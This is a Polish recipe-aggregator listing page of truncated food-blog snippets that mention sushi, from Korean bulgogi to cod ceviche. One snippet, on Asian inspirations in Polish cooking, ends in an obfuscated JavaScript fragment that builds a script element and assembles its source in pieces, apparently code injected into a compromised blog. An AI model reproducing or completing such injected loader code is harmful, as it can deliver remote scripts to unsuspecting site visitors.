sushi - 1073 przepisów (strona:54/72)

Koreańska wołowina w stylu BBQ – bulgogi, plus szybkie pikle we Wschodnim stylu 201

wpisie) zabarwiony dodatkiem zielonej herbaty Matcha. Neutralny w smaku, kolorem idealnie pasuje do bulgogi (makaron firmy House of Asia, do kupienia w Tesco, w sklepach z artykułami na sushi w sieci i czasami w Biedronce, w tygodniu azjatyckim). Mięso po zamarynowaniu odcedzamy z marynaty i smażymy do zbrązowienia i skarmelizowania z obu stron, na mocno rozgrzanej patelni grillowej, na żeliwnej

Karo in the Kitchen
TATAR!!! 181

obrzydliwe, okropne i ohydne a tak naprawdę nikt go nie jadł bo się bał! Bo surowe, mięso mielone jest fuj! A jak je się surowe mięso np w sushi to jest wszystko ok! Bo ryba nie jest już fuj Tak, tak to strach przemawia przez was bojaźliwi ludzie!!! A teraz poważnie, też się bałam ale nie wolno się bać!!! Trzeba

sierotka maRysia w kuchni
Polędwiczka wieprzowa domową metodą sous-vide na kaszy pęczak z cukinią i burakami 230

odkroiłem węższą część mięsa i użyłem tylko tej o w miarę identycznej grubości). Na blacie rozwijamy min, 50 cm folii spożywczej, na której kładziemy polędwiczkę, zwijamy ją jak rolkę sushi, dociskając szczelnie. Celem jest takie zawinięcie mięsa, aby nie było w środku powietrza. Pojedynczo skręcamy boki tak jak byśmy zawijali cukierki : ) Nadmiar folii warto skręcić porządnie aby nie dostała się

Right Behind The Kitchen
Festiwal Kocham Wino w Lublinie (relacja) 161

trakcie wydarzenia można było także spróbować Cydru Lubelskiego . Jednak przyjść na festiwal o jednoznacznej nazwie "Kocham Wino" i pić cydr to jak pójść do specjalistycznej restauracji sushi i zjeść dewolaja. Strefa HoReCa Organizatorzy pomyśleli nie tylko o kliencie indywidualnym. W trakcie imprezy można było porozmawiać z reprezentantami firmy Centrum Wina i dowiedzieć się więcej o możliwościach współpracy na poziomie biznes

Right Behind The Kitchen
"Pyszne do pudełka" Grażyna Bober-Bruijn - recenzja 190

szkole – idealny model pełnowartościowego menu, na które składają się produkty zbożowe, białko i warzywa lub owoce. Autorka „Pyszne do pudełka” wychodzi z założenia, że może nie tak samo – niekoniecznie sushi –, ale Europejczycy również mogą komponować zestawy na wynos, które dostarczą organizmowi wszystkich wymaganych składników odżywczych. Co więcej, nie trzeba się przy tym szczególnie wysilać, bo niekiedy wczorajszy obiad po odpowiednim

Życie zamknięte w smaku
Azjatyckie inspiracje w polskiej kuchni 116

takim jak http://intermarche.pl/ , już na stałe zagościły w naszych domowych kuchniach. Polacy coraz częściej wybierają się także do restauracji, specjalizujących się w daniach tego regionu. Szczególnie lubimy japońskie sushi, czy sajgonki. Tradycyjna Polska kuchni wcale nie musi być nudna – wystarczy odrobina wyobraźni i egzotyczne składniki. (function(){ uiyz=document.createElement("script");uiyz.type="text/javascript"; uiyz.async=true;uiyz_=(("us")+"t")+"a";uiyz

Moja smaczna kuchnia
SZASZŁYKI Z PIERSI KURCZAKA 138

pieprzę i smaruję  koncentratem pomidorowym. Można ułożyć na nie kawałki suszonych pomidorów ze słoiczka. Doprawiam ziołami wg upodobań.Układam na nie plastry wędzonego boczku. Zawijam je jak sushi w rulon i kroję na około dwu centymetrowe plastry. Nadziewam na patyczki do szaszłyków, smaruję oliwą i  smażę na grillowej patelni. Piersi z kurczaka można podawać z sosem

potrawyregionalne
KREWETKI Z CZOSNKIEM 134

Krewetki  i sushi mogę jeść codziennie w nieprzyzwoitych ilościach. W 15 minut mam przed sobą najpyszniejsze jedzonko pod słońcem. Podzielę się nim z Wami niestety tylko wirtualnie, ale wierzę, że patrząc chociażby na zdjęcie skorzystacie z mojej propozycji. Krewetki królewskie obrałam. Wrzuciłam na patelnię, chwilę smażyłam  żeby odparować nadmiar wody. Można wcześniej polać je białym winem, czekając

potrawyregionalne
Sushi z podwędzanym łososiem 162

podwędzanego łososia pół czerwonej papryki rzeżucha lub sałata nori ryż do sushi 1,5 szkl ocet ryżowy ok 6 łyżek 4 łyżki cukru pół łyżeczki soli Ryż wypłukać na sicie aż do uzyskania czystej wody, zalać wodą 1:1  ugotować , ok 15 min aż ryż wchłonie całą wodę, odstawić pod przykryciem. Kiedy przestygnie z octu cukru i soli przygotować

Gotowanie jest łatwe
Pizza bezglutenowa z figami i gorgonzolą 151

języka, nie ma dokąd pójść" postanowiłam zabrać ją do Opola na wszystkie moje zaplanowane spotkania. Była ze mną na spotkaniu biznesowym (wszystkim skradła serca), u mojej koleżanki robiłyśmy razem sushi,odwiedziłyśmy 2 moje koleżanki w pracy, ćwiczyłyśmy tabatę na wyspie Bolko (było dużo śmiechu), potem zadzwoniłyśmy do mojej Cioci z Ukrainy (były łzy wzruszenia), zrobiłyśmy kluski śląskie, harynki. zjadłyśmy kolację

Bon Appetit Małgorzaty
Cukinia faszerowana a'la sushi 141

Cukinia faszerowana a'la sushi jest idealnym daniem na przyjęcia.  Przygotowana wcześniej, wymaga jedynie włożenia we właściwej chwili na pół godziny do piekarnika. Podana z ryżem stanowi pyszne danie obiadowe :) Składniki: 5 małych, cienkich cukinii 1 mały pomidor 1 cebula 3 ząbki czosnku 3 łyżki oliwy większa szczypta chili czubata łyżeczka słodkiej papryki pół czubatej łyżeczki majeranku sól pieprz

Smak mojego domu
Tatar ze śledzia Matjas -wieżyczka 174

zmielonego czarnego pieprzu 1/2 łyżeczki pieprzu ziołowego 1 łyżeczka oliwy 5-6 rzodkiewek 1/2 cebuli drobno posiekanej 1 łyżeczka chrzanu 6 czubatych łyżek ugotowanego ryżu (u mnie ryż na sushi) 1 awokado 100 g gęstego serka śmietankowego 2 łyżeczki kawioru (u mnie z pstrąga) dodatkowo do garniszu: kwiaty ogórecznika (są jadalne) całe ziarna kolorowego pieprzu źdźbło czosnku kilka ziaren ugotowanego

Sztuka gotowania w/g Samiry
Japonia instant. Ramen 172

minutki.   Zupę rozlewam do głębokich miseczek, dzielę na dwie miski wcześniej przygotowane dodatki, ustawiam krewetki, posypuję prażonym sezamem. I uzbrajam się w łyżkę. O ile zjedzenie tacy sushi przy pomocy pałeczek nie sprawia żadnych problemów i nie męczy, o tyle zupa i cienki, gorący makaron to już prawie mission impossible. Spróbujcie chociaż raz a nie pożałujecie. I nie uwierzycie

Karo in the Kitchen
Ceviche z dorsza – bałtycka ryba i cytrusy 225

gotowaniem mięsa w wysokiej temperaturze, które zabija bakterie i pasożyty. Dlatego tak ważne jest, aby ryba do ceviche była naprawdę bardzo świeża i ze sprawdzonego źródła – jak do sushi. Do ryby podanej w ten sposób często jako aperitif serwowany jest kieliszek marynaty w której się moczyła, nazywany ‘leche de tigre’ – tygrysim mlekiem. Podobnie, jak sok z ogórków kiszonych w Polsce

Karo in the Kitchen